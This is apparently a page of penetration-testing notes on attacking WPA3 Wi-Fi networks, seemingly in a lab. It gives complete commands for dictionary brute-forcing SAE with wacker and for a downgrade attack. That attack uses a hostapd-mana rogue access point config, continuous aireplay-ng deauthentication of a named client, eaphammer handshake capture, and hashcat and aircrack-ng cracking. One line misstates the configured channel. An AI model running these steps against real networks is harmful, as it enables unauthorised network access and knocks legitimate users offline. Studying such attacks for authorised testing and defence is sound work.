WPA3

Bruteforcing WPA3

In WPA3 networks, it is still possible to brute force until the password is found. To do this, we can use “wacker”.

Setting up Wacker

GitHub - ammartiger/wacker: A WPA3 dictionary crackerGitHub

Make the script executable

chmod +x wacker.py

Now make wpa supplicant binary executable

chmod +x wpa_supplicant-2.10/wpa_supplicant/wpa_supplicant

Tab 1: Target Discovery

Identify the WPA3 network details.

airodump-ng --band abg wlan8mon

Target SSID: SweetB-WPA3
BSSID: 02:00:00:00:02:00 (Note: Use the specific MAC shown in your scan)
Channel: 36
Encryption: Look for WPA3 CCMP SAE.

Tab 2: The Wacker Attack

Wacker is a specialized tool that automates the SAE authentication loop to test passwords.

Navigate to Tool: cd /home/rogue1/opt/wacker/
Command:

./wacker.py --wordlist /home/rogue1/opt/rockyouwifi.txt --interface wlan5 --ssid SweetB-WPA3 --bssid 02:00:00:00:02:00 --freq 5180

Flag Breakdown:
- --wordlist: Path to your dictionary file.
- --interface: Use a managed interface (e.g., wlan1), NOT a monitor mode interface, as Wacker interacts with the wpa_supplicant stack.
- --freq: The frequency in MHz (e.g., Channel 36 = 5180).
Success: When the password is found, it will output: Found the password: 'password1'.

WPA3 downgrade attack

If a network with WPA3 SAE has a client configured for WPA2/WPA3, we can perform a downgrade against the client, forcing it to connect to our RogueAP with WPA2, obtaining the handshake to crack it later, as in the case of Wi-Fi offices. In this case, we can see that the AP uses SAE and PSK, so maybe the clients accept PSK too. We can get this information in the airodump-ng “.csv” file.

First, do the reconnaissance and observe the channel of our target Network.

sudo airodump-ng wlan0mon --band abg

Now, capture the packets and write them to a file.

sudo airodump-ng wlan0mon -c 11 -w wifi-IT

We will get a CSV file. And if we look closely, we can see that our target Network does support WPA2 PSK as well

We can also check if the AP has MFP(802.11w) with Wireshark:

Open the captured pcap file with Wireshark and look for management frame protection.

In this case, 802.11w is disabled, so we can deauth:

Now, we can create our config file for our rogue AP.

hostapd-sae.conf

interface=wlan1
driver=nl80211
hw_mode=g
channel=6
ssid=wifi-IT
mana_wpaout=hostapd-management.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

We need to change the channel to some other channel for our rogue AP otherwise it does not work

This is a Hostapd configuration file used to set up a fake access point (AP) for penetration testing purposes. Here’s a breakdown of each line:

interface=wlan1 → Specifies that wlan1 is the wireless network interface to be used for hosting the fake AP.
driver=nl80211 → Uses the nl80211 driver, which is common for modern Linux-based wireless devices.
hw_mode=g → Sets the 802.11g standard, which operates on the 2.4 GHz band and supports speeds up to 54 Mbps.
channel=6 → Specifies Channel 11 for the AP.
ssid=wifi-IT → This is the SSID (Wi-Fi network name) that the AP will broadcast.
mana_wpaout=hostapd-management.hccapx → Captures WPA handshakes and saves them in the HCCAPX format, which is used for offline password cracking with Hashcat.
wpa=2 → Configures WPA2 encryption (stronger than WPA1).
wpa_key_mgmt=WPA-PSK → Uses Pre-Shared Key (PSK) authentication.
wpa_pairwise=TKIP CCMP → Supports both TKIP (legacy) and CCMP (AES-based, stronger encryption).
wpa_passphrase=12345678 → Sets the Wi-Fi password to 12345678.

What This Configuration Does

✅ Creates a fake Wi-Fi network named "wifi-IT" on channel 6. ✅ Uses WPA2-PSK encryption with the password "12345678". ✅ Captures WPA handshakes in HCCAPX format for cracking later. ✅ Uses wlan1 interface with nl80211 driver.

hostapd-mana hostapd-sae.conf

# In this case, 802.11w is disabled, so we can deauth
iwconfig wlan0mon channel 11
aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25  -c 10:F9:6F:AC:53:52

And you will be able to capture the handshake.

Copy the hash from the terminal to a new file

nano hash.txt

Crack outside the VM or with a new version of hashcat.

sudo hashcat -a 0 -m 22000 hash.txt ~/10-million-password-list-top-100000.txt --force

2nd Method - Using EAPhammer

Eaphammer can also be used to start rogue AP.

sudo eaphammer -i wlan1 -c 6 --auth wpa-psk -e wifi-IT --creds

Now start monitoring the original AP by fixating on the channel.

 sudo airodump-ng wlan0mon -c 11

In another tab, do the deauth attack against the original AP

sudo aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25  -c 10:F9:6F:AC:53:52

Once the client connects to our rogue AP, we get our handshake.

Copy the captured handshake to the current directory

cp /var/lib/eaphammer/loot/wpa_handshake_capture-2026-03-25-14-55-16-alBEtUvMusxDe51Dxcgf0r6zRP1psWKA.hccapx .

Now we can use Aircrack to crack the password

sudo aircrack-ng wpa_handshake_capture.hccapx -w ~/10-million-password-list-top-100000.txt

For cracking with hashcat we need to convert this file.

hcxhash2cap --hccapx=wpa_handshake_capture.hccapx -c wpa3.pcap

Export the 22000 hash mode from the pcap

hcxpcapngtool wpa3.pcap -o wpa3.22000

Now, crack outside the VM or with a new version of hashcat.

sudo hashcat -a 0 -m 22000 wpa3.22000 ~/10-million-password-list-top-100000.txt --force

Tip: Deleting the Hashcat potfile

find / -name "*.potfile" 2>/dev/null
rm -rf /root/.local/share/hashcat/hashcat.potfile

PreviousWPS NextEnterprise WIFI Hacking MGT/ EAP-PEAP

Last updated 10 hours ago

hashtagBruteforcing WPA3

hashtagSetting up Wacker

hashtagTab 1: Target Discovery

hashtagTab 2: The Wacker Attack

hashtagWPA3 downgrade attack

hashtagWhat This Configuration Does

hashtag2nd Method - Using EAPhammer

hashtagTip: Deleting the Hashcat potfile